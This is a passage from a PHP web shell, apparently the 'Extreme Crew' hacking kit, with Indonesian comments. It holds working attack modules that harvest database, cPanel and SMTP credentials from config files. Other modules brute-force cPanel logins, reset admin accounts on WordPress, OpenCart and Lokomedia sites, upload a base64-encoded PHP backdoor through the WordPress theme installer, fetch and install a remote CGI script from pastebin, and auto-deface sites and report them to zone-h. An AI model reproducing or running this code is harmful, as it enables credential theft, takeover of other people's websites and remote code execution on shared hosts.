1174 if(!$update OR !$conn OR !$db) {
1175 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1176 } else {
1177 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1178 }
1179 mysql_close($conn);
1180 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
1181 $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
1182 $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
1183 $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
1184 $dbname = ambilkata($config,"'DB_DATABASE', '","'");
1185 $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
1186 $prefix = $dbprefix."user";
1187 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1188 $db = mysql_select_db($dbname);
1189 $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1190 $result = mysql_fetch_array($q);
1191 $id = $result[user_id];
1192 $target = ambilkata($config,"HTTP_SERVER', '","'");
1193 if($target == '') {
1194 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1195 } else {
1196 $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
1197 }
1198 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1199 echo "Config => ".$file_conf."<br>";
1200 echo "CMS => OpenCart<br>";
1201 echo $url_target;
1202 if(!$update OR !$conn OR !$db) {
1203 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1204 } else {
1205 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1206 }
1207 mysql_close($conn);
1208 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
1209 $dbhost = ambilkata($config,'server = "','"');
1210 $dbuser = ambilkata($config,'username = "','"');
1211 $dbpass = ambilkata($config,'password = "','"');
1212 $dbname = ambilkata($config,'database = "','"');
1213 $prefix = "users";
1214 $option = "identitas";
1215 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1216 $db = mysql_select_db($dbname);
1217 $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
1218 $result = mysql_fetch_array($q);
1219 $target = $result[alamat_website];
1220 if($target == '') {
1221 $target2 = $result[url];
1222 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1223 if($target2 == '') {
1224 $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1225 } else {
1226 $cek_login3 = file_get_contents("$target2/adminweb/");
1227 $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
1228 if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
1229 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
1230 } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
1231 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
1232 } else {
1233 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1234 }
1235 }
1236 } else {
1237 $cek_login = file_get_contents("$target/adminweb/");
1238 $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
1239 if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
1240 $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
1241 } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
1242 $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
1243 } else {
1244 $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1245 }
1246 }
1247 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1248 echo "Config => ".$file_conf."<br>";
1249 echo "CMS => Lokomedia<br>";
1250 if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
1251 echo $url_target2;
1252 } else {
1253 echo $url_target;
1254 }
1255 if(!$update OR !$conn OR !$db) {
1256 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1257 } else {
1258 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1259 }
1260 mysql_close($conn);
1261 }
1262 }
1263 }
1264 } else {
1265 echo "<center>
1266 <h1>Auto Edit User Config</h1>
1267 <form method='post'>
1268 DIR Config: <br>
1269 <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1270 Set User & Pass: <br>
1271 <input type='text' name='user_baru' value='Extreme Crew' placeholder='user_baru'><br>
1272 <input type='text' name='pass_baru' value='Extreme Crew' placeholder='pass_baru'><br>
1273 <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
1274 </form>
1275 <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1276 ";
1277 }
1278} elseif($_GET['do'] == 'cpanel') {
1279 if($_POST['crack']) {
1280 $usercp = explode("\r\n", $_POST['user_cp']);
1281 $passcp = explode("\r\n", $_POST['pass_cp']);
1282 $i = 0;
1283 foreach($usercp as $ucp) {
1284 foreach($passcp as $pcp) {
1285 if(@mysql_connect('localhost', $ucp, $pcp)) {
1286 if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1287 } else {
1288 $_SESSION[$ucp] = "1";
1289 $_SESSION[$pcp] = "1";
1290 if($ucp == '' || $pcp == '') {
1291
1292 } else {
1293 $i++;
1294 if(function_exists('posix_getpwuid')) {
1295 $domain_cp = file_get_contents("/etc/named.conf");
1296 if($domain_cp == '') {
1297 $dom = "<font color=red>gabisa ambil nama domain nya</font>";
1298 } else {
1299 preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1300 foreach($domains_cp[1] as $dj) {
1301 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1302 $user_cp_url = $user_cp_url['name'];
1303 if($user_cp_url == $ucp) {
1304 $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
1305 break;
1306 }
1307 }
1308 }
1309 } else {
1310 $dom = "<font color=red>function is Disable by system</font>";
1311 }
1312 echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
1313 }
1314 }
1315 }
1316 }
1317 }
1318 if($i == 0) {
1319 } else {
1320 echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>Extreme Crew.</font>";
1321 }
1322 } else {
1323 echo "<center>
1324 <form method='post'>
1325 USER: <br>
1326 <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1327 $_usercp = fopen("/etc/passwd","r");
1328 while($getu = fgets($_usercp)) {
1329 if($getu == '' || !$_usercp) {
1330 echo "<font color=red>Can't read /etc/passwd</font>";
1331 } else {
1332 preg_match_all("/(.*?):x:/", $getu, $u);
1333 foreach($u[1] as $user_cp) {
1334 if(is_dir("/home/$user_cp/public_html")) {
1335 echo "$user_cp\n";
1336 }
1337 }
1338 }
1339 }
1340 echo "</textarea><br>
1341 PASS: <br>
1342 <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1343 function cp_pass($dir) {
1344 $pass = "";
1345 $dira = scandir($dir);
1346 foreach($dira as $dirb) {
1347 if(!is_file("$dir/$dirb")) continue;
1348 $ambil = file_get_contents("$dir/$dirb");
1349 if(preg_match("/WordPress/", $ambil)) {
1350 $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1351 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1352 $pass .= ambilkata($ambil,"password = '","'")."\n";
1353 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1354 $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1355 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1356 $pass .= ambilkata($ambil,'password = "','"')."\n";
1357 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1358 $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1359 } elseif(preg_match("/^[client]$/", $ambil)) {
1360 preg_match("/password=(.*?)/", $ambil, $pass1);
1361 if(preg_match('/"/', $pass1[1])) {
1362 $pass1[1] = str_replace('"', "", $pass1[1]);
1363 $pass .= $pass1[1]."\n";
1364 } else {
1365 $pass .= $pass1[1]."\n";
1366 }
1367 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1368 $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1369 }
1370 }
1371 echo $pass;
1372 }
1373 $cp_pass = cp_pass($dir);
1374 echo $cp_pass;
1375 echo "</textarea><br>
1376 <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1377 </form>
1378 <br><span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1379 }
1380} elseif($_GET['do'] == 'smtp') {
1381 echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
1382 function scj($dir) {
1383 $dira = scandir($dir);
1384 foreach($dira as $dirb) {
1385 if(!is_file("$dir/$dirb")) continue;
1386 $ambil = file_get_contents("$dir/$dirb");
1387 $ambil = str_replace("$", "", $ambil);
1388 if(preg_match("/JConfig|joomla/", $ambil)) {
1389 $smtp_host = ambilkata($ambil,"smtphost = '","'");
1390 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1391 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1392 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1393 $smtp_port = ambilkata($ambil,"smtpport = '","'");
1394 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1395 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
1396 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
1397 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
1398 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
1399 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
1400 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
1401 }
1402 }
1403 }
1404 $smpt_hunter = scj($dir);
1405 echo $smpt_hunter;
1406} elseif($_GET['do'] == 'auto_wp') {
1407 if($_POST['hajar']) {
1408 $title = htmlspecialchars($_POST['new_title']);
1409 $pn_title = str_replace(" ", "-", $title);
1410 if($_POST['cek_edit'] == "Y") {
1411 $script = $_POST['edit_content'];
1412 } else {
1413 $script = $title;
1414 }
1415 $conf = $_POST['config_dir'];
1416 $scan_conf = scandir($conf);
1417 foreach($scan_conf as $file_conf) {
1418 if(!is_file("$conf/$file_conf")) continue;
1419 $config = file_get_contents("$conf/$file_conf");
1420 if(preg_match("/WordPress/", $config)) {
1421 $dbhost = ambilkata($config,"DB_HOST', '","'");
1422 $dbuser = ambilkata($config,"DB_USER', '","'");
1423 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1424 $dbname = ambilkata($config,"DB_NAME', '","'");
1425 $dbprefix = ambilkata($config,"table_prefix = '","'");
1426 $prefix = $dbprefix."posts";
1427 $option = $dbprefix."options";
1428 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1429 $db = mysql_select_db($dbname);
1430 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1431 $result = mysql_fetch_array($q);
1432 $id = $result[ID];
1433 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1434 $result2 = mysql_fetch_array($q2);
1435 $target = $result2[option_value];
1436 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1437 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1438 echo "<div style='margin: 5px auto;'>";
1439 if($target == '') {
1440 echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
1441 } else {
1442 echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1443 }
1444 if(!$update OR !$conn OR !$db) {
1445 echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1446 } else {
1447 echo "<font color=lime>sukses di ganti.</font><br>";
1448 }
1449 echo "</div>";
1450 mysql_close($conn);
1451 }
1452 }
1453 } else {
1454 echo "<center>
1455 <h1>Auto Edit Title+Content WordPress</h1>
1456 <form method='post'>
1457 DIR Config: <br>
1458 <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1459 Set Title: <br>
1460 <input type='text' name='new_title' value='Hacked by Extreme Crew' placeholder='New Title'><br><br>
1461 Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1462 <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
1463 <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
1464 <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
1465 </form>
1466 <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1467 ";
1468 }
1469} elseif($_GET['do'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
1470} elseif($_GET['do'] == 'zoneh') {
1471 if($_POST['submit']) {
1472 $domain = explode("\r\n", $_POST['url']);
1473 $nick = $_POST['nick'];
1474 echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1475 echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1476 function zoneh($url,$nick) {
1477 $ch = curl_init("http://www.zone-h.com/notify/single");
1478 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1479 curl_setopt($ch, CURLOPT_POST, true);
1480 curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1481 return curl_exec($ch);
1482 curl_close($ch);
1483 }
1484 foreach($domain as $url) {
1485 $zoneh = zoneh($url,$nick);
1486 if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
1487 echo "$url -> <font color=lime>OK</font><br>";
1488 } else {
1489 echo "$url -> <font color=red>ERROR</font><br>";
1490 }
1491 }
1492 } else {
1493 echo "<center><form method='post'>
1494 <u>Defacer</u>: <br>
1495 <input type='text' name='nick' size='50' value='Extreme Crew'><br>
1496 <u>Domains</u>: <br>
1497 <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
1498 <input type='submit' name='submit' value='Submit' style='width: 450px;'>
1499 </form>";
1500 }
1501 echo "</center>";
1502} elseif($_GET['do'] == 'cgi') {
1503 $cgi_dir = mkdir('ec_cgi', 0755);
1504 $file_cgi = "ec_cgi/cgi.izo";
1505 $isi_htcgi = "AddHandler cgi-script .izo";
1506 $htcgi = fopen(".htaccess", "w");
1507 $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
1508 $cgi = fopen($file_cgi, "w");
1509 fwrite($cgi, $cgi_script);
1510 fwrite($htcgi, $isi_htcgi);
1511 chmod($file_cgi, 0755);
1512 echo "<iframe src='ec_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
1513} elseif($_GET['do'] == 'fake_root') {
1514 ob_start();
1515 $cwd = getcwd();
1516 $ambil_user = explode("/", $cwd);
1517 $user = $ambil_user[2];
1518 if($_POST['reverse']) {
1519 $site = explode("\r\n", $_POST['url']);
1520 $file = $_POST['file'];
1521 foreach($site as $url) {
1522 $cek = getsource("$url/~$user/$file");
1523 if(preg_match("/hacked/i", $cek)) {
1524 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
1525 }
1526 }
1527 } else {
1528 echo "<center><form method='post'>
1529 Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
1530 User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
1531 Domain: <br>
1532 <textarea style='width: 450px; height: 250px;' name='url'>";
1533 reverse($_SERVER['HTTP_HOST']);
1534 echo "</textarea><br>
1535 <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
1536 </form><br>
1537 NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
1538 }
1539} elseif($_GET['do'] == 'adminer') {
1540 $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1541 function adminer($url, $isi) {
1542 $fp = fopen($isi, "w");
1543 $ch = curl_init();
1544 curl_setopt($ch, CURLOPT_URL, $url);
1545 curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1546 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1547 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1548 curl_setopt($ch, CURLOPT_FILE, $fp);
1549 return curl_exec($ch);
1550 curl_close($ch);
1551 fclose($fp);
1552 ob_flush();
1553 flush();
1554 }
1555 if(file_exists('adminer.php')) {
1556 echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1557 } else {
1558 if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1559 echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1560 } else {
1561 echo "<center><font color=red>gagal buat file adminer</font></center>";
1562 }
1563 }
1564} elseif($_GET['do'] == 'auto_dwp') {
1565 if($_POST['auto_deface_wp']) {
1566 function anucurl($sites) {
1567 $ch = curl_init($sites);
1568 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1569 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1570 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1571 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1572 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1573 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1574 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1575 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1576 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1577 $data = curl_exec($ch);
1578 curl_close($ch);
1579 return $data;
1580 }
1581 function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1582 $post = array(
1583 "log" => "$userr",
1584 "pwd" => "$pass",
1585 "rememberme" => "forever",
1586 "wp-submit" => "$wp_submit",
1587 "redirect_to" => "$web",
1588 "testcookie" => "1",
1589 );
1590 $ch = curl_init($cek);
1591 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1592 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1593 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1594 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1595 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1596 curl_setopt($ch, CURLOPT_POST, 1);
1597 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1598 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1599 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1600 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1601 $data = curl_exec($ch);
1602 curl_close($ch);
1603 return $data;
1604 }
1605 $scan = $_POST['link_config'];
1606 $link_config = scandir($scan);
1607 $script = htmlspecialchars($_POST['script']);
1608 $user = "Extreme Crew";
1609 $pass = "Extreme Crew";
1610 $passx = md5($pass);
1611 foreach($link_config as $dir_config) {
1612 if(!is_file("$scan/$dir_config")) continue;
1613 $config = file_get_contents("$scan/$dir_config");
1614 if(preg_match("/WordPress/", $config)) {
1615 $dbhost = ambilkata($config,"DB_HOST', '","'");
1616 $dbuser = ambilkata($config,"DB_USER', '","'");
1617 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1618 $dbname = ambilkata($config,"DB_NAME', '","'");
1619 $dbprefix = ambilkata($config,"table_prefix = '","'");
1620 $prefix = $dbprefix."users";
1621 $option = $dbprefix."options";
1622 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1623 $db = mysql_select_db($dbname);
1624 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1625 $result = mysql_fetch_array($q);
1626 $id = $result[ID];
1627 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1628 $result2 = mysql_fetch_array($q2);
1629 $target = $result2[option_value];
1630 if($target == '') {
1631 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1632 } else {
1633 echo "[+] $target <br>";
1634 }
1635 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1636 if(!$conn OR !$db OR !$update) {
1637 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1638 mysql_close($conn);
1639 } else {
1640 $site = "$target/wp-login.php";
1641 $site2 = "$target/wp-admin/theme-install.php?upload";
1642 $b1 = anucurl($site2);
1643 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1644 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1645 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1646 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1647 $www = "m.php";
1648 $fp5 = fopen($www,"w");
1649 fputs($fp5,$upload3);
1650 $post2 = array(
1651 "_wpnonce" => "$anu2",
1652 "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1653 "themezip" => "@$www",
1654 "install-theme-submit" => "Install Now",
1655 );
1656 $ch = curl_init("$target/wp-admin/update.php?ec=ciumakumz&action=upload-theme");
1657 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1658 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1659 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1660 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1661 curl_setopt($ch, CURLOPT_POST, 1);
1662 curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1663 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1664 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1665 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1666 $data3 = curl_exec($ch);
1667 curl_close($ch);
1668 $y = date("Y");
1669 $m = date("m");
1670 $namafile = "id.php";
1671 $fpi = fopen($namafile,"w");
1672 fputs($fpi,$script);
1673 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1674 curl_setopt($ch6, CURLOPT_POST, true);
1675 curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1676 curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1677 curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1678 curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1679 curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
1680 $postResult = curl_exec($ch6);
1681 curl_close($ch6);
1682 $as = "$target/k.php";
1683 $bs = anucurl($as);
1684 if(preg_match("#$script#is", $bs)) {
1685 echo "[+] <font color='lime'>berhasil mepes...</font><br>";
1686 echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1687 } else {
1688 echo "[-] <font color='red'>gagal mepes...</font><br>";
1689 echo "[!!] coba aja manual: <br>";
1690 echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1691 echo "[+] username: <font color=lime>$user</font><br>";
1692 echo "[+] password: <font color=lime>$pass</font><br><br>";
1693 }
1694 mysql_close($conn);
1695 }
1696 }
1697 }
1698 } else {
1699 echo "<center><h1>WordPress Auto Deface</h1>
1700 <form method='post'>
1701 <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
1702 <input type='text' name='script' height='10' size='50' placeholder='Hacked by Extreme Crew' required><br>
1703 <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1704 </form>
1705 <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
1706 </center>";
1707 }
1708} elseif($_GET['do'] == 'auto_dwp2') {
1709 if($_POST['auto_deface_wp']) {
1710 function anucurl($sites) {
1711 $ch = curl_init($sites);
1712 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1713 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1714 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1715 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1716 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1717 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1718 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1719 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1720 curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1721 $data = curl_exec($ch);
1722 curl_close($ch);
1723 return $data;
1724 }
1725 function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1726 $post = array(
1727 "log" => "$userr",
1728 "pwd" => "$pass",
1729 "rememberme" => "forever",
1730 "wp-submit" => "$wp_submit",
1731 "redirect_to" => "$web",
1732 "testcookie" => "1",
1733 );
1734 $ch = curl_init($cek);
1735 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1736 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1737 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1738 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1739 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1740 curl_setopt($ch, CURLOPT_POST, 1);
1741 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1742 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1743 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1744 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1745 $data = curl_exec($ch);
1746 curl_close($ch);
1747 return $data;
1748 }
1749 $link = explode("\r\n", $_POST['link']);
1750 $script = htmlspecialchars($_POST['script']);
1751 $user = "Extreme Crew";
1752 $pass = "Extreme Crew";
1753 $passx = md5($pass);
1754 foreach($link as $dir_config) {
1755 $config = anucurl($dir_config);
1756 $dbhost = ambilkata($config,"DB_HOST', '","'");
1757 $dbuser = ambilkata($config,"DB_USER', '","'");
1758 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1759 $dbname = ambilkata($config,"DB_NAME', '","'");
1760 $dbprefix = ambilkata($config,"table_prefix = '","'");
1761 $prefix = $dbprefix."users";
1762 $option = $dbprefix."options";
1763 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1764 $db = mysql_select_db($dbname);
1765 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1766 $result = mysql_fetch_array($q);
1767 $id = $result[ID];
1768 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1769 $result2 = mysql_fetch_array($q2);
1770 $target = $result2[option_value];
1771 if($target == '') {
1772 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1773 } else {
1774 echo "[+] $target <br>";
1775 }
1776 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1777 if(!$conn OR !$db OR !$update) {
1778 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1779 mysql_close($conn);
1780 } else {
1781 $site = "$target/wp-login.php";
